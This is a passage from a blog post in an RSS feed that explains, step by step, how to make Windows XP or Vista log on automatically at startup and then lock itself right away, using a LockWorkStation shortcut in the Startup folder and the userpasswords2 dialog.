<p>Copy and paste the following into the location. If you wish to type it, please note that it is cAsE SeNsItIvE.</p>
<p><em><strong>%windir%\System32\rundll32.exe user32.dll,LockWorkStation</strong></em></p>
<p>Make sure there are no trailing spaces at the beginning or end of the line.</p>
<div id="attachment_23" class="wp-caption alignnone" style="width: 310px;"><a href="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/41.jpg"><img class="size-medium wp-image-23" title="Step 2" src="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/41-300x223.jpg" alt="Step 4" width="300" height="223" /></a></p>
<p class="wp-caption-text">Step 2</p>
</div>
<p>Click “<em>Next</em>” to continue”</p>
<h3>Step 3:</h3>
<p>Change the default name for your shortcut from “<em>rundll32.exe</em>” to anything that you want. I called mine “<em>Lock</em>“.</p>
<div id="attachment_24" class="wp-caption alignnone" style="width: 310px;"><a href="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/51.jpg"><img class="size-medium wp-image-24" title="Step 3" src="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/51-300x222.jpg" alt="Step 5" width="300" height="222" /></a></p>
<p class="wp-caption-text">Step 3</p>
</div>
<p>Then click “<em>Finish</em>“.</p>
<h3>Step 4:</h3>
<p>Now double click on your newly created shortcut and it should lock your computer. It will not log you off.</p>
<p>Just type your password back in on the logon screen and you will see! If it comes up with an error, then delete the shortcut and go back to Step 3.</p>
<h3>Step 5:</h3>
<p>Right-click on your shortcut and select “<em>Cut</em>” from the menu.</p>
<h3>Step 6:</h3>
<p>Click on the start menu and then go to “<em>All Programs</em>“. Find a folder in there called “<em>Startup</em>“, right-click on it and select “<em>Open</em>“.</p>
<div id="attachment_25" class="wp-caption alignnone" style="width: 310px;"><a href="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/8.jpg"><img class="size-medium wp-image-25" title="Step 6" src="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/8-300x216.jpg" alt="Step 8" width="300" height="216" /></a></p>
<p class="wp-caption-text">Step 6</p>
</div>
<h3>Step 7:</h3>
<p>Now, right-click any where in the “<em>Startup</em>” folder and select paste. You will see your shortcut be placed in there.</p>
<h3>Step 8:</h3>
<p>Click on the “<em>Start</em>” menu and select “<em>Run</em>“.</p>
<p>Vista Users can type “<em>Run</em>” into the search field in the start menu if it isn’t present.</p>
<h3>Step 9:</h3>
<p>OK, so, if you’re using Windows XP you have to type “<em>control userpasswords2</em>” as the run command and click “<em>OK</em>”</p>
<div id="attachment_20" class="wp-caption alignnone" style="width: 310px;"><a href="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/1.jpg"><img class="size-medium wp-image-20" title="Step 9" src="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/1-300x160.jpg" alt="Step 2" width="300" height="160" /></a></p>
<p class="wp-caption-text">Step 9</p>
</div>
<p>Vista users do the same:</p>
<div id="attachment_21" class="wp-caption alignnone" style="width: 310px;"><a href="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/21.jpg"><img class="size-medium wp-image-21" title="Step 9, Vista" src="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/21-300x162.jpg" alt="Step 2, Vista" width="300" height="162" /></a></p>
<p class="wp-caption-text">Step 9, Vista</p>
</div>
<p>If the security window comes up in Vista, just click “<em>Continue</em>“.</p>
<h3>Step 10:</h3>
<p>You will see a window come up called “<em>User Accounts</em>“.</p>
<p><span style="text-decoration: underline;">Uncheck</span> the tick box that says “<em>Users must enter a user name and password to use this computer</em>“.</p>
<p>Then click “<em>Apply</em>“.</p>
<p>You will be asked to enter in the password twice for your username.</p>
<p>Enter your password and click “<em>OK</em>“.</p>
<div id="attachment_26" class="wp-caption alignnone" style="width: 286px;"><a href="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/10.jpg"><img class="size-medium wp-image-26" title="Step 10" src="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/10-276x300.jpg" alt="Step 10" width="276" height="300" /></a></p>
<p class="wp-caption-text">Step 10</p>
</div>
<p>Click “<em>OK</em>” again on the user accounts screen.</p>
<h3>Step 11:</h3>
<p>That’s it! You’re done! If you want to test this, restart your computer. You will see it load up, then it will bypass the logon screen, loggin you on, then it will lock your computer still loading up all your startup programs!</p>
<p>Via <a href="http://www.bestcomputersolution.com/blog/logon-automatically-and-lock-computer-with-password">bestcomputersolution.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/logon-automatically-and-lock-computer/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

